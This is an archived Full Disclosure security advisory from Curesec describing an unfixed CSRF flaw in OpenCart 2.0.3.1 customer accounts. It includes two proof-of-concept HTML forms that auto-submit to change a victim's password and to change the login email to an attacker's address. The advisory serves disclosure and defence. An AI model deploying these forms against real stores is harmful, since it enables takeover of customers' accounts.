Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

OpenCart 2.0.3.1: CSRF

From: "Curesec Research Team (CRT)" <crt () curesec com>
Date: Tue, 03 Nov 2015 11:53:44 +0100
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    OpenCart 2.0.3.1
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Website:      https://www.opencart.com/
Vulnerability Type:  CSRF
Remote Exploitable:  Yes
Reported to vendor:  09/01/2015
Disclosed to public: 10/07/2015
Release mode:        Full Disclosure
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Vulnerability Description

While CSRF protection exists for the actions of an admin, it does not exist for
customers. This means that customer accounts can be compromised by an attacker
if the victim visits an attacker controlled website while logged in.

This issue was already discovered in 2013 by Saadat Ullah, but new versions of
OpenCart are still vulnerable as no fix has been released.

3. Proof of Concept

Change Password:


<form name="myform" method="post" action="http://localhost/opencart-2.0.3.1/upload/index.php?route=account/password"; >
    <input type="hidden" name="password" value="12345">
    <input type="hidden" name="confirm" value="12345">
</form>
<script>document.myform.submit();</script>

Change profile information, including email address, which is used when logging
in:


<form name="myform" method="post" action="http://localhost/opencart-2.0.3.1/upload/index.php?route=account/edit"; >
    <input type="hidden" name="currency" value="USD">
    <input type="hidden" name="language" value="en">
    <input type="hidden" name="firstname" value="Jane">
    <input type="hidden" name="lastname" value="Smith">
    <input type="hidden" name="email" value="attacker () evil com">
    <input type="hidden" name="telephone" value="1234567">
</form>
<script>document.myform.submit();</script>

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

09/01/   Informed Vendor about Issue (no reply)
2015
09/22/   Reminded Vendor of disclosure date
2015
09/23/   Vendor points out that issue is already known, and that they do not
2015     plan on releasing a fix
10/07/   Disclosed to public
2015


Blog Reference:
http://blog.curesec.com/article/blog/OpenCart-2031-CSRF-66.html

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Previous By Date Next
Previous By Thread Next

Current thread: